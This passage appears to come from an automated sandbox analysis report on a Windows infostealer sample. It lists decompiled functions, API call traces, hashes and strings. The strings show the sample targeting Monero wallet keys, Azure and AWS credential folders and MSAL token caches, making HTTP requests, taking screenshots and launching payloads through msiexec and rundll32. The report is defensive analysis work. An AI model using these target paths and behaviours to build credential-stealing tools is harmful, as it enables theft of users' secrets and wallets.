                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 397c48b4b0068ecb50ae2fa26138d9ea16d1f8646ccb765916b5941725f2d534
                                  • Instruction ID: bbf664d7457c7456efcf52c802e17d1fd52eb5a10c17e40ac55ad3de5c8ab762
                                  • Opcode Fuzzy Hash: 397c48b4b0068ecb50ae2fa26138d9ea16d1f8646ccb765916b5941725f2d534
                                  • Instruction Fuzzy Hash: 8212E171870118ABEB19EBA0DC96FEEB378FF54700F5041A9F10A62091EF706A59CF65
                                  Function 0023CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0023CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0023D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0023D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D208
                                  • lstrcat.KERNEL32(?,00251478), ref: 0023D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D22A
                                  • lstrcat.KERNEL32(?,0025147C), ref: 0023D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D24C
                                  • lstrcat.KERNEL32(?,00251480), ref: 0023D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D26E
                                  • lstrcat.KERNEL32(?,00251484), ref: 0023D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D290
                                  • lstrcat.KERNEL32(?,00251488), ref: 0023D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D2B2
                                  • lstrcat.KERNEL32(?,0025148C), ref: 0023D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023D2D4
                                  • lstrcat.KERNEL32(?,00251490), ref: 0023D2E3
                                    • Part of subcall function 0024A820: lstrlen.KERNEL32(00234F05,?,?,00234F05,00250DDE), ref: 0024A82B
                                    • Part of subcall function 0024A820: lstrcpy.KERNEL32(00250DDE,00000000), ref: 0024A885
                                  • lstrlen.KERNEL32(?), ref: 0023D32A
                                  • lstrlen.KERNEL32(?), ref: 0023D339
                                    • Part of subcall function 0024AA70: StrCmpCA.SHLWAPI(01048A08,0023A7A7,?,0023A7A7,01048A08), ref: 0024AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0023D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 6ce65089820a3299b1e4a870d0e994a3488131bc389e70b4613a3725805fe6f7
                                  • Instruction ID: 47dadfd92db1bf2170be9b60c16154ce043b643c1f3df4e85b97790899a6f6e1
                                  • Opcode Fuzzy Hash: 6ce65089820a3299b1e4a870d0e994a3488131bc389e70b4613a3725805fe6f7
                                  • Instruction Fuzzy Hash: D3E12E71960108ABDB08FBA0DD96EEE7378FF54301F104168F50BA6091DE35AE69CF66
                                  Function 0023C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0104D7C0,00000000,?,0025144C,00000000,?,?), ref: 0023CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0023CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0023CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0023CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0023CAD9
                                  • StrStrA.SHLWAPI(?,0104D880,00250B52), ref: 0023CAF7
                                  • StrStrA.SHLWAPI(00000000,0104DA90), ref: 0023CB1E
                                  • StrStrA.SHLWAPI(?,0104E448,00000000,?,00251458,00000000,?,00000000,00000000,?,010488D8,00000000,?,00251454,00000000,?), ref: 0023CCA2
                                  • StrStrA.SHLWAPI(00000000,0104E708), ref: 0023CCB9
                                    • Part of subcall function 0023C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0023C871
                                    • Part of subcall function 0023C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0023C87C
                                  • StrStrA.SHLWAPI(?,0104E708,00000000,?,0025145C,00000000,?,00000000,010489A8), ref: 0023CD5A
                                  • StrStrA.SHLWAPI(00000000,01048AA8), ref: 0023CD71
                                    • Part of subcall function 0023C820: lstrcat.KERNEL32(?,00250B46), ref: 0023C943
                                    • Part of subcall function 0023C820: lstrcat.KERNEL32(?,00250B47), ref: 0023C957
                                    • Part of subcall function 0023C820: lstrcat.KERNEL32(?,00250B4E), ref: 0023C978
                                  • lstrlen.KERNEL32(00000000), ref: 0023CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 0023CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 3277df19ab2114f90b5fe27850666b3e25e94135158505bd76af6ea0c63df07f
                                  • Instruction ID: 66d309ddacaffd086b0e0dcc71c6b3b9a987618858dd188e80eeceb2888b8cbb
                                  • Opcode Fuzzy Hash: 3277df19ab2114f90b5fe27850666b3e25e94135158505bd76af6ea0c63df07f
                                  • Instruction Fuzzy Hash: 47E11171960108ABEB18EBA0DC96FEEB778EF54300F404169F50677191DF306A6ACF66
                                  Function 00248320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,0104BA50,00000000,00020019,00000000,002505B6), ref: 002483A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00248426
                                  • wsprintfA.USER32 ref: 00248459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0024847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00248499
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: beaa982b2598f5ef8cfb6d06e1bff33d2afa472c111f89bc54c2761dad5a3dd3
                                  • Instruction ID: c6c09a6af82728d05ca5e844da30e3196cc8d9589370b227b60f2fa4a002d385
                                  • Opcode Fuzzy Hash: beaa982b2598f5ef8cfb6d06e1bff33d2afa472c111f89bc54c2761dad5a3dd3
                                  • Instruction Fuzzy Hash: 3F811D71960118ABEB28DF54CC91FEEB7B8FF48704F008298E109A6180DF716B99CF95
                                  Function 00244D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00244DCD
                                    • Part of subcall function 00244910: wsprintfA.USER32 ref: 0024492C
                                    • Part of subcall function 00244910: FindFirstFileA.KERNEL32(?,?), ref: 00244943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00244E59
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,00250FDC), ref: 00244971
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,00250FE0), ref: 00244987
                                    • Part of subcall function 00244910: FindNextFileA.KERNEL32(000000FF,?), ref: 00244B7D
                                    • Part of subcall function 00244910: FindClose.KERNEL32(000000FF), ref: 00244B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00244EE5
                                    • Part of subcall function 00244910: wsprintfA.USER32 ref: 002449B0
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,002508D2), ref: 002449C5
                                    • Part of subcall function 00244910: wsprintfA.USER32 ref: 002449E2
                                    • Part of subcall function 00244910: PathMatchSpecA.SHLWAPI(?,?), ref: 00244A1E
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,0104FB90), ref: 00244A4A
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,00250FF8), ref: 00244A5C
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,?), ref: 00244A70
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,00250FFC), ref: 00244A82
                                    • Part of subcall function 00244910: lstrcat.KERNEL32(?,?), ref: 00244A96
                                    • Part of subcall function 00244910: CopyFileA.KERNEL32(?,?,00000001), ref: 00244AAC
                                    • Part of subcall function 00244910: DeleteFileA.KERNEL32(?), ref: 00244B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: d4c379eba668d3fc44064a9644a7c252cdc847eebff393f963ac6acf9ac008c2
                                  • Instruction ID: f8ecbdec03fdd5e2814d5bb7775abf44e37107492836aad8be8afdd9c22e37d1
                                  • Opcode Fuzzy Hash: d4c379eba668d3fc44064a9644a7c252cdc847eebff393f963ac6acf9ac008c2
                                  • Instruction Fuzzy Hash: 254183BA96020866D754F760EC47FED3238AB64701F404894BA49660C2EEB057FC8F92
                                  Function 00249010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0024906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: de8109da76d62d8cb20fd8f8fadf069d4940dd8caf425b7286e727a0781574c6
                                  • Instruction ID: a6c19aa63459c72c8ab8869791e09a58ff75c4ee5d90d349a05c1f7ba97aef5b
                                  • Opcode Fuzzy Hash: de8109da76d62d8cb20fd8f8fadf069d4940dd8caf425b7286e727a0781574c6
                                  • Instruction Fuzzy Hash: 8F71E1B1910208ABDB08EFE4DC89FDEB7B8BF88700F148518F519A7290DB749955CF65
                                  Function 00242E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 002431C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0024335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 002434EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 8daba1561233a89110bf40ffa2c56d0b0b1aad11d05b1843cd5f8ee1a1f10a5b
                                  • Instruction ID: c584787d57b746bab70b7c8b1a13ae7ae6d16d1c2b1619242540c8756fdf4f9f
                                  • Opcode Fuzzy Hash: 8daba1561233a89110bf40ffa2c56d0b0b1aad11d05b1843cd5f8ee1a1f10a5b
                                  • Instruction Fuzzy Hash: D312ED71860108AAEB1DFBA0DC92FEDB738EF14300F504159F50666191EF742B6ACFA6
                                  Function 002452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 00236280: InternetOpenA.WININET(00250DFE,00000001,00000000,00000000,00000000), ref: 002362E1
                                    • Part of subcall function 00236280: StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00236303
                                    • Part of subcall function 00236280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00236335
                                    • Part of subcall function 00236280: HttpOpenRequestA.WININET(00000000,GET,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00236385
                                    • Part of subcall function 00236280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002363BF
                                    • Part of subcall function 00236280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002363D1
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00245318
                                  • lstrlen.KERNEL32(00000000), ref: 0024532F
                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00245364
                                  • lstrlen.KERNEL32(00000000), ref: 00245383
                                  • lstrlen.KERNEL32(00000000), ref: 002453AE
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: bcd15ad26a216a3016d0fc996bac8ebc967280c231de3d51fc5fb665d7a9dd4e
                                  • Instruction ID: b9c55556155965a23d8d55fc635094abbb6b179d093eef96ac494bed85ffcde7
